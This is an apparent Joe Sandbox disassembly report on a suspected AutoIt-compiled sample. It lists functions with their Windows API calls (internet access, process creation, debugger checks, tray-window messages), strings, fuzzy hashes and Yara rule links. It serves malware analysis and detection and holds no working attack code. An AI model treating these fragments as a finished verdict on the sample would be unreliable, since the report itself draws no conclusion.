              • _wcslen.LIBCMT ref: 0074D130
              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0074D13A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CrackInternet_wcslen
              • String ID: |
              • API String ID: 596671847-2343686810
              • Opcode ID: a465e94310c23077c28105d607f8b93dd37bac1d089417086656fe9248bd2cf8
              • Instruction ID: e59fd2e0ac6a2cf8cec74010fba208d9631ebaecb1b8c1c259c371b053f00249
              • Opcode Fuzzy Hash: a465e94310c23077c28105d607f8b93dd37bac1d089417086656fe9248bd2cf8
              • Instruction Fuzzy Hash: 4A313D75D00209ABCF55EFA4CC85AEE7FBAFF04304F00001EF915A6265EB35AA06DB64
              Function 0076356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
              Download Yara Rule
              APIs
              • DestroyWindow.USER32(?,?,?,?), ref: 00763621
              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0076365C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$DestroyMove
              • String ID: static
              • API String ID: 2139405536-2160076837
              • Opcode ID: c8e6cfa3169c1c75736e33e52170659dcf13f0283030f38f5132c7439da916ff
              • Instruction ID: 0b018369fd3b9a489186bb0b1438f142749cebde83e9bbb639f7de2853470b09
              • Opcode Fuzzy Hash: c8e6cfa3169c1c75736e33e52170659dcf13f0283030f38f5132c7439da916ff
              • Instruction Fuzzy Hash: D6318F71100204AAEB109F78DC40EFB73A9FF88724F00961DFDA697290DA78AD91C764
              Function 00764537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0076461F
              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00764634
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: '
              • API String ID: 3850602802-1997036262
              • Opcode ID: ab699a260db84c5bb369bb4190484bc0103a0ae4a289b47af5b896dcc71c7fd0
              • Instruction ID: 72c942bbd99c6debff109d02880331025b851ce6089effceb8528f1a1fad5da1
              • Opcode Fuzzy Hash: ab699a260db84c5bb369bb4190484bc0103a0ae4a289b47af5b896dcc71c7fd0
              • Instruction Fuzzy Hash: 38312774A0120A9FDF14CFA9C980BDA7BB5FF49300F14406AED06AB342D774A951CF90
              Function 007631EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0076327C
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00763287
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: MessageSend
              • String ID: Combobox
              • API String ID: 3850602802-2096851135
              • Opcode ID: 7af11ecf8bb60870da8cc17cd972c3026f2ddf3e5915b2f50e469d35d4754fc3
              • Instruction ID: 997092defedd7166d6c326abea698cf3df1a7257746bfd621fad275c15de15f4
              • Opcode Fuzzy Hash: 7af11ecf8bb60870da8cc17cd972c3026f2ddf3e5915b2f50e469d35d4754fc3
              • Instruction Fuzzy Hash: 6D11E271300208BFFF25DE54DC90EBB37AAFB943A4F104128F91A97290D6799D51C760
              Function 00763710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006D604C
                • Part of subcall function 006D600E: GetStockObject.GDI32(00000011), ref: 006D6060
                • Part of subcall function 006D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006D606A
              • GetWindowRect.USER32(00000000,?), ref: 0076377A
              • GetSysColor.USER32(00000012), ref: 00763794
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Window$ColorCreateMessageObjectRectSendStock
              • String ID: static
              • API String ID: 1983116058-2160076837
              • Opcode ID: 03b58c3129f5cc7066945cc0bc8f5d78177e02a807bc320969db50b7de55f22b
              • Instruction ID: 2c7ec7d799701aa0b904c0064bc4e49e8059ed111dbd1e3e19ce8f9e2161f1b1
              • Opcode Fuzzy Hash: 03b58c3129f5cc7066945cc0bc8f5d78177e02a807bc320969db50b7de55f22b
              • Instruction Fuzzy Hash: 301129B2610209AFDB01DFA8CC45AFA7BB8EB09354F004515FD56E2250D779E851DB50
              Function 0074CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
              Download Yara Rule
              APIs
              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0074CD7D
              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0074CDA6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Internet$OpenOption
              • String ID: <local>
              • API String ID: 942729171-4266983199
              • Opcode ID: 34323b5b75b6ce3f73b590345d31a23327883da23e3e426dc5bc9ab067ad6a41
              • Instruction ID: dbab2b53fac9e62d10b9ed610a221f4dba34d8bb70a7981863a5ebe6da7a048e
              • Opcode Fuzzy Hash: 34323b5b75b6ce3f73b590345d31a23327883da23e3e426dc5bc9ab067ad6a41
              • Instruction Fuzzy Hash: 4A11C671B066357AD77A4B668C45EF7BE6CEF127A4F004226B15983190D7789840DAF0
              Function 00763429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
              Download Yara Rule
              APIs
              • GetWindowTextLengthW.USER32(00000000), ref: 007634AB
              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007634BA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LengthMessageSendTextWindow
              • String ID: edit
              • API String ID: 2978978980-2167791130
              • Opcode ID: 559d64c93edb163c6a708ed535b0a48eb677e41e237ca7eb311fac5ad25c8fe7
              • Instruction ID: 9fb7c6079535bb392dd25087fbc61fb171528b6c80150ee07aec7863c1f1da1e
              • Opcode Fuzzy Hash: 559d64c93edb163c6a708ed535b0a48eb677e41e237ca7eb311fac5ad25c8fe7
              • Instruction Fuzzy Hash: 67118F71500248ABEB128E64DC44ABB7B6AEF05374F504324FD62931E0CB79DC55D754
              Function 00736C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              • CharUpperBuffW.USER32(?,?,?), ref: 00736CB6
              • _wcslen.LIBCMT ref: 00736CC2
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen$BuffCharUpper
              • String ID: STOP
              • API String ID: 1256254125-2411985666
              • Opcode ID: 3534ddd493c9639bf4845917164db8fc284de755b1b78ada218143f0c87bbd91
              • Instruction ID: 88536fb71b3386e1935d9d56455dea9e4b6f74483a1bd23c55d658a4f7139fb9
              • Opcode Fuzzy Hash: 3534ddd493c9639bf4845917164db8fc284de755b1b78ada218143f0c87bbd91
              • Instruction Fuzzy Hash: 85010432B10526AADB21AFBDDC808BF77B5EA61714B004529E85296292EA39E800C760
              Function 00731BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
                • Part of subcall function 00733CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00733CCA
              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00731C46
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ClassMessageNameSend_wcslen
              • String ID: ComboBox$ListBox
              • API String ID: 624084870-1403004172
              • Opcode ID: 62033c9b61dabb5e675a745da89209886e9d980bb17c98cd766979a6c4651087
              • Instruction ID: ce2ed5b33887f172cb3ee2702713faf09f5a97b6cbc0ff6224d0102d0443231d
              • Opcode Fuzzy Hash: 62033c9b61dabb5e675a745da89209886e9d980bb17c98cd766979a6c4651087
              • Instruction Fuzzy Hash: 0901F7B1B8010466DF18EBA0D951DFF73A89B11340F50141AB416632C2EA289E0887B5
              Function 006EA4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 006EA529
                • Part of subcall function 006D9CB3: _wcslen.LIBCMT ref: 006D9CBD
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer_wcslen
              • String ID: ,%z$3yr
              • API String ID: 2551934079-955863410
              • Opcode ID: 2c4402e50c6b6e5617de2a358b820810c71575378733b799208fc222c24c016d
              • Instruction ID: a7edfe76951cb832cd2e0e8b42d4ed51f45b5ad6cc231fccb0dd3219fdbcb2c3
              • Opcode Fuzzy Hash: 2c4402e50c6b6e5617de2a358b820810c71575378733b799208fc222c24c016d
              • Instruction Fuzzy Hash: 0401F231B017549BD604F7A9E85BAAD3366AB46710F50046DF612572C3EE14AD028AAF
              Function 00768172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
              Download Yara Rule
              APIs
              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007A3018,007A305C), ref: 007681BF
              • CloseHandle.KERNEL32 ref: 007681D1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseCreateHandleProcess
              • String ID: \0z
              • API String ID: 3712363035-4117864471
              • Opcode ID: a61c4887d1ae87d44d9d30118545c56bac6687de06d588077019c85d9200f800
              • Instruction ID: dcfd1650ff9f9dad5c39c1766fac693be47aafce6192e2c3c65a1f6bcf4a2800
              • Opcode Fuzzy Hash: a61c4887d1ae87d44d9d30118545c56bac6687de06d588077019c85d9200f800
              • Instruction Fuzzy Hash: 8FF05EF2640304BAF2206B61AC55FB77A5EEB46750F008425FB09D51A2D67E8A0086BD
              Function 0075747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: _wcslen
              • String ID: 3, 3, 16, 1
              • API String ID: 176396367-3042988571
              • Opcode ID: 668f778a576d829853c95fb52ae7cc8b47ad75ac4e95dc629c2aaf48cae7b939
              • Instruction ID: 385c44522ca8449eb092b8a0874ad614c195783e724050bf3574240c502b062e
              • Opcode Fuzzy Hash: 668f778a576d829853c95fb52ae7cc8b47ad75ac4e95dc629c2aaf48cae7b939
              • Instruction Fuzzy Hash: CDE02B423142A01092791279BCC19BF578ACFC6751714182FFE85C2266EED88D91D3E4
              Function 00730B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
              Download Yara Rule
              APIs
              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00730B23
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Message
              • String ID: AutoIt$Error allocating memory.
              • API String ID: 2030045667-4017498283
              • Opcode ID: 131052c1a3818fc4de7a040c59b1d7c23eacf3dbce4ed8f085bb07cc2c64a18f
              • Instruction ID: db5bb6c375a93d2569122dcf9fc21b6f71fd352c79be6d3f560ff1877fbf2cc8
              • Opcode Fuzzy Hash: 131052c1a3818fc4de7a040c59b1d7c23eacf3dbce4ed8f085bb07cc2c64a18f
              • Instruction Fuzzy Hash: 3FE0DF722853583BE3513795BC03F997A858F05B20F10442EFB88A95C38AEA389046ED
              Function 006F0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 006EF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006F0D71,?,?,?,006D100A), ref: 006EF7CE
              • IsDebuggerPresent.KERNEL32(?,?,?,006D100A), ref: 006F0D75
              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,006D100A), ref: 006F0D84
              Strings
              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006F0D7F
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
              • API String ID: 55579361-631824599
              • Opcode ID: 08586736283a9378a41a567f06ac25862b2519157e89f1f7dd5278a938f7f14a
              • Instruction ID: c89ad6e1c1728380409cfe396672cbd7fd08949ee8f91528d2ba984c61e2b0c2
              • Opcode Fuzzy Hash: 08586736283a9378a41a567f06ac25862b2519157e89f1f7dd5278a938f7f14a
              • Instruction Fuzzy Hash: 25E06D742003518FE7619FB9E8143667BE5BF04744F00892DE982C6656DBB9E4448B91
              Function 006EE398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
              Download Yara Rule
              APIs
              • __Init_thread_footer.LIBCMT ref: 006EE3D5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Init_thread_footer
              • String ID: 0%z$8%z
              • API String ID: 1385522511-2349322819
              • Opcode ID: 4190390cf1a6c48f1de5394a7e45111aae993ceb4ca50ec6c9f91f4c40954f51
              • Instruction ID: 3744494fa0a67f3dfa4f14a2a431c119b8d081dbc42e476797605829c0a387a6
              • Opcode Fuzzy Hash: 4190390cf1a6c48f1de5394a7e45111aae993ceb4ca50ec6c9f91f4c40954f51
              • Instruction Fuzzy Hash: 69E02639C09B54CBCA0CD71DB874A983397BB86320B1042F9E102876D3DB3A28438A5C
              Function 0072D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: LocalTime
              • String ID: %.3d$X64
              • API String ID: 481472006-1077770165
              • Opcode ID: 1823d0bf07577613be6fc554173f19c25d3abedaa6638b6d60d2e2043f11883e
              • Instruction ID: ee66dbbef33b84b311bd7062fc21563a31b46b20e366d64bca3fc53b704cf9fb
              • Opcode Fuzzy Hash: 1823d0bf07577613be6fc554173f19c25d3abedaa6638b6d60d2e2043f11883e
              • Instruction Fuzzy Hash: DDD012A1809268EACBA097E0EC498B9B3FCBB08301F608452F90692040D62CC908A761
              Function 00762356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
              Download Yara Rule
              APIs
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076236C
              • PostMessageW.USER32(00000000), ref: 00762373
                • Part of subcall function 0073E97B: Sleep.KERNEL32 ref: 0073E9F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FindMessagePostSleepWindow
              • String ID: Shell_TrayWnd
              • API String ID: 529655941-2988720461
              • Opcode ID: 5f749bf7df67a6de6ab2796c857d9412b6678a646be30653d4a4d9f1e0fb9096
              • Instruction ID: 9eaab2e10343fe383bf4a067f1f56af5326f29a07584b892d261a9c81393eb2f
              • Opcode Fuzzy Hash: 5f749bf7df67a6de6ab2796c857d9412b6678a646be30653d4a4d9f1e0fb9096
              • Instruction Fuzzy Hash: 6BD0C972381310BAEA65B770EC0FFD67A149B04B10F108A56B687AA1D1C9E8B8018A58
              Function 00762322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
              Download Yara Rule
              APIs
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0076232C
              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0076233F
                • Part of subcall function 0073E97B: Sleep.KERNEL32 ref: 0073E9F3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
              • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: FindMessagePostSleepWindow
              • String ID: Shell_TrayWnd
              • API String ID: 529655941-2988720461
              • Opcode ID: bf7602e66a36ccdc5d640188f58874fe06d0f56ff74ab4b7f44bd8ae54560674
              • Instruction ID: ce25b423a7a44cd15642b3326b928e59ee0dfa6404ea332435358f6cfadc79ab
              • Opcode Fuzzy Hash: bf7602e66a36ccdc5d640188f58874fe06d0f56ff74ab4b7f44bd8ae54560674
              • Instruction Fuzzy Hash: EDD01276394310B7EA64B770EC0FFD67A149B04B10F108A56B787AA1D1C9F8B801CB58